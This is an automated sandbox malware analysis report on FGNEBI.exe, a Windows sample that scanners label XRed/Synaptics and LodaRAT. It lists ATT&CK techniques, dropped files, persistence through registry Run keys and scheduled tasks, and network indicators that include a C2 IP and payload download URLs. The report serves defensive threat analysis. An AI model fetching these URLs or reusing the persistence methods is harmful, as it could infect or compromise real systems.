                              Source: DELPQB.exeBinary or memory string: WIN_XPe
                              Source: DELPQB.exe, 0000001A.00000002.1816621155.00000000041AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_812
                              Source: DELPQB.exeBinary or memory string: WIN_VISTA
                              Source: DELPQB.exeBinary or memory string: WIN_7
                              Source: DELPQB.exeBinary or memory string: WIN_8
                              Source: Yara matchFile source: 00000002.00000002.2668876953.000000000485E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: ._cache_FGNEBI.exe PID: 8008, type: MEMORYSTR

                              Remote Access Functionality

                              barindex
                              Source: Yara matchFile source: Process Memory Space: ._cache_FGNEBI.exe PID: 8008, type: MEMORYSTR
                              Source: Yara matchFile source: FGNEBI.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.FGNEBI.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1399677835.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000003.1490710331.000000000062D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: FGNEBI.exe PID: 7916, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 8036, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX5CF5.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DE91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00DE91DC
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DE96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00DE96E2
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_002391DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,10_2_002391DC
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_002396E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_002396E2
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information421
                              Scripting
                              2
                              Valid Accounts
                              11
                              Windows Management Instrumentation
                              421
                              Scripting
                              1
                              Exploitation for Privilege Escalation
                              1
                              Disable or Modify Tools
                              21
                              Input Capture
                              2
                              System Time Discovery
                              Remote Services1
                              Archive Collected Data
                              4
                              Ingress Tool Transfer
                              Exfiltration Over Other Network Medium1
                              System Shutdown/Reboot
                              CredentialsDomains1
                              Replication Through Removable Media
                              2
                              Native API
                              1
                              DLL Side-Loading
                              1
                              DLL Side-Loading
                              1
                              Deobfuscate/Decode Files or Information
                              LSASS Memory1
                              Peripheral Device Discovery
                              Remote Desktop Protocol21
                              Input Capture
                              11
                              Encrypted Channel
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts1
                              Scheduled Task/Job
                              2
                              Valid Accounts
                              1
                              Extra Window Memory Injection
                              21
                              Obfuscated Files or Information
                              Security Account Manager1
                              Account Discovery
                              SMB/Windows Admin Shares3
                              Clipboard Data
                              3
                              Non-Application Layer Protocol
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron1
                              Scheduled Task/Job
                              2
                              Valid Accounts
                              1
                              Software Packing
                              NTDS4
                              File and Directory Discovery
                              Distributed Component Object ModelInput Capture34
                              Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd21
                              Registry Run Keys / Startup Folder
                              21
                              Access Token Manipulation
                              1
                              DLL Side-Loading
                              LSA Secrets38
                              System Information Discovery
                              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                              Process Injection
                              1
                              Extra Window Memory Injection
                              Cached Domain Credentials161
                              Security Software Discovery
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                              Scheduled Task/Job
                              12
                              Masquerading
                              DCSync31
                              Virtualization/Sandbox Evasion
                              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job21
                              Registry Run Keys / Startup Folder
                              2
                              Valid Accounts
                              Proc Filesystem3
                              Process Discovery
                              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                              Virtualization/Sandbox Evasion
                              /etc/passwd and /etc/shadow11
                              Application Window Discovery
                              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                              Access Token Manipulation
                              Network Sniffing1
                              System Owner/User Discovery
                              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
                              Process Injection
                              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582341 Sample: FGNEBI.exe Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 57 freedns.afraid.org 2->57 59 xred.mooo.com 2->59 61 4 other IPs or domains 2->61 71 Suricata IDS alerts for network traffic 2->71 73 Found malware configuration 2->73 75 Antivirus detection for URL or domain 2->75 79 18 other signatures 2->79 9 FGNEBI.exe 1 6 2->9         started        12 DELPQB.exe 2->12         started        15 EXCEL.EXE 225 70 2->15         started        17 6 other processes 2->17 signatures3 77 Uses dynamic DNS services 57->77 process4 file5 49 C:\Users\user\Desktop\._cache_FGNEBI.exe, PE32 9->49 dropped 51 C:\ProgramData\Synaptics\Synaptics.exe, PE32 9->51 dropped 53 C:\ProgramData\Synaptics\RCX5CF5.tmp, PE32 9->53 dropped 55 C:\...\Synaptics.exe:Zone.Identifier, ASCII 9->55 dropped 19 ._cache_FGNEBI.exe 2 5 9->19         started        24 Synaptics.exe 20 9->24         started        93 Multi AV Scanner detection for dropped file 12->93 95 Machine Learning detection for dropped file 12->95 signatures6 process7 dnsIp8 63 172.111.138.100, 49727, 49740, 49742 VOXILITYGB United States 19->63 43 C:\Users\user\AppData\Roaming\...\DELPQB.exe, PE32 19->43 dropped 45 C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, ASCII 19->45 dropped 81 Multi AV Scanner detection for dropped file 19->81 83 Machine Learning detection for dropped file 19->83 26 cmd.exe 1 19->26         started        29 wscript.exe 19->29         started        65 drive.usercontent.google.com 142.250.185.193, 443, 49718, 49719 GOOGLEUS United States 24->65 67 docs.google.com 172.217.16.206, 443, 49711, 49712 GOOGLEUS United States 24->67 69 freedns.afraid.org 69.42.215.252, 49715, 80 AWKNET-LLCUS United States 24->69 47 C:\Users\user\Documents\~$cache1, PE32 24->47 dropped 85 Antivirus detection for dropped file 24->85 87 Drops PE files to the document folder of the user 24->87 31 WerFault.exe 24->31         started        33 WerFault.exe 24->33         started        35 WerFault.exe 24->35         started        37 WerFault.exe 24->37         started        file9 signatures10 process11 signatures12 89 Uses schtasks.exe or at.exe to add and modify task schedules 26->89 39 conhost.exe 26->39         started        41 schtasks.exe 26->41         started        91 Windows Scripting host queries suspicious COM object (likely to drop second stage) 29->91 process13

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              FGNEBI.exe92%ReversingLabsWin32.Trojan.Synaptics
                              FGNEBI.exe87%VirustotalBrowse
                              FGNEBI.exe100%AviraTR/Dldr.Agent.SH
                              FGNEBI.exe100%AviraW2000M/Dldr.Agent.17651006
                              FGNEBI.exe100%Joe Sandbox ML
                              SourceDetectionScannerLabelLink
                              C:\Users\user\AppData\Local\Temp\WLJOQW.vbs100%AviraVBS/Runner.VPJI
                              C:\ProgramData\Synaptics\RCX5CF5.tmp100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\RCX5CF5.tmp100%AviraW2000M/Dldr.Agent.17651006
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                              C:\Users\user\Documents\~$cache1100%AviraTR/Dldr.Agent.SH
                              C:\Users\user\Documents\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                              C:\ProgramData\Synaptics\RCX5CF5.tmp100%Joe Sandbox ML
                              C:\Users\user\Desktop\._cache_FGNEBI.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Roaming\Windata\DELPQB.exe100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                              C:\Users\user\Documents\~$cache1100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\RCX5CF5.tmp100%ReversingLabsWin32.Worm.Zorex
                              C:\ProgramData\Synaptics\Synaptics.exe92%ReversingLabsWin32.Trojan.Synaptics
                              C:\Users\user\AppData\Roaming\Windata\DELPQB.exe47%ReversingLabsWin32.Trojan.Lisk
                              C:\Users\user\Desktop\._cache_FGNEBI.exe47%ReversingLabsWin32.Trojan.Lisk
                              C:\Users\user\Documents\~$cache1100%ReversingLabsWin32.Worm.Zorex
                              No Antivirus matches
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              http://xred.site50.net/syn/Synaptics.rarh100%Avira URL Cloudmalware
                              https://docs.goopF0%Avira URL Cloudsafe
                              http://xred.site50.net/syn/SSLLibrary.dlD100%Avira URL Cloudmalware
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              freedns.afraid.org
                              69.42.215.252
                              truefalse
                                high
                                docs.google.com
                                172.217.16.206
                                truefalse
                                  high
                                  s-part-0017.t-0009.t-msedge.net
                                  13.107.246.45
                                  truefalse
                                    high
                                    drive.usercontent.google.com
                                    142.250.185.193
                                    truefalse
                                      high
                                      xred.mooo.com
                                      unknown
                                      unknownfalse
                                        high
                                        NameMaliciousAntivirus DetectionReputation
                                        xred.mooo.comfalse
                                          high
                                          http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                            high
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmpfalse
                                              high
                                              https://docs.google.com/p/cspreportSynaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://docs.goopFSynaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1~$cache1.3.drfalse
                                                    high
                                                    https://drive.usercontent.google.com/%Synaptics.exe, 00000003.00000003.1515835379.000000000542E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://docs.google.com/nSynaptics.exe, 00000003.00000002.1610030732.000000000064E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          high
                                                          https://drive.usercontent.google.com/Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1515835379.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.0000000005439000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.000000000542E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://ip-score.com/checkip/Brave-Browser._cache_FGNEBI.exe, 00000002.00000002.2668876953.000000000485E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://upx.sf.netAmcache.hve.15.drfalse
                                                                high
                                                                http://xred.site50.net/syn/Synaptics.rar~$cache1.3.drfalse
                                                                  high
                                                                  http://xred.site50.net/syn/Synaptics.rarhFGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://docs.google.com/Synaptics.exe, 00000003.00000002.1610030732.000000000064E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlXFGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://xred.site50.net/syn/SSLLibrary.dlDFGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1~$cache1.3.drfalse
                                                                            high
                                                                            https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1~$cache1.3.drfalse
                                                                              high
                                                                              https://docs.google.com/XSynaptics.exe, 00000003.00000002.1610030732.000000000064E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978DSynaptics.exe, 00000003.00000002.1610030732.000000000061A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://xred.site50.net/syn/SUpdate.ini~$cache1.3.drfalse
                                                                                      high
                                                                                      https://docs.google.com/QSynaptics.exe, 00000003.00000002.1617542093.00000000053D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978xFGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc6135629787Synaptics.exe, 00000003.00000002.1610030732.000000000061A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://xred.site50.net/syn/SSLLibrary.dll~$cache1.3.drfalse
                                                                                                high
                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs
                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                142.250.185.193
                                                                                                drive.usercontent.google.comUnited States
                                                                                                15169GOOGLEUSfalse
                                                                                                172.217.16.206
                                                                                                docs.google.comUnited States
                                                                                                15169GOOGLEUSfalse
                                                                                                172.111.138.100
                                                                                                unknownUnited States
                                                                                                3223VOXILITYGBtrue
                                                                                                69.42.215.252
                                                                                                freedns.afraid.orgUnited States
                                                                                                17048AWKNET-LLCUSfalse
                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                Analysis ID:1582341
                                                                                                Start date and time:2024-12-30 11:33:25 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 10m 13s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                Number of analysed new started processes analysed:32
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:FGNEBI.exe
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.expl.evad.winEXE@24/29@4/4
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 66.7%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 99%
                                                                                                • Number of executed functions: 89
                                                                                                • Number of non-executed functions: 281
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .exe
                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                • Excluded IPs from analysis (whitelisted): 52.109.89.18, 52.113.194.132, 184.28.90.27, 51.132.193.105, 20.42.65.92, 20.190.159.64, 4.175.87.197, 23.206.229.226, 13.107.246.45
                                                                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, weu-azsc-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, www.bing.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, onedscolprduks05.uksouth.cloudapp.azure.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                • Execution Graph export aborted for target Synaptics.exe, PID 8036 because there are no executed function
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                TimeTypeDescription
                                                                                                05:34:28API Interceptor34x Sleep call for process: Synaptics.exe modified
                                                                                                05:34:37API Interceptor3x Sleep call for process: WerFault.exe modified
                                                                                                11:34:24Task SchedulerRun new task: WLJOQW.exe path: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                11:34:24AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WLJOQW "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                                                                                11:34:33AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                11:34:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WLJOQW "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                                                                                11:34:50AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WLJOQW.lnk
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                172.111.138.100LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                  JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                        AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                          222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            mmi8nLybam.exeGet hashmaliciousLodaRATBrowse
                                                                                                              Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                  New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    69.42.215.252docx.msiGet hashmaliciousXRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    222.msiGet hashmaliciousXRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    s-part-0017.t-0009.t-msedge.netdocx.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    222.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.comGet hashmaliciousUnknownBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    installer64v9.5.7.msiGet hashmaliciousUnknownBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    freedns.afraid.orgdocx.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    222.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    VOXILITYGBLWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    mmi8nLybam.exeGet hashmaliciousLodaRATBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 104.250.189.221
                                                                                                                    Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    AWKNET-LLCUSdocx.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    222.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    37f463bf4616ecd445d4a1937da06e19docx.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 142.250.185.193
                                                                                                                    • 172.217.16.206
                                                                                                                    hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 142.250.185.193
                                                                                                                    • 172.217.16.206
                                                                                                                    222.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 142.250.185.193
                                                                                                                    • 172.217.16.206
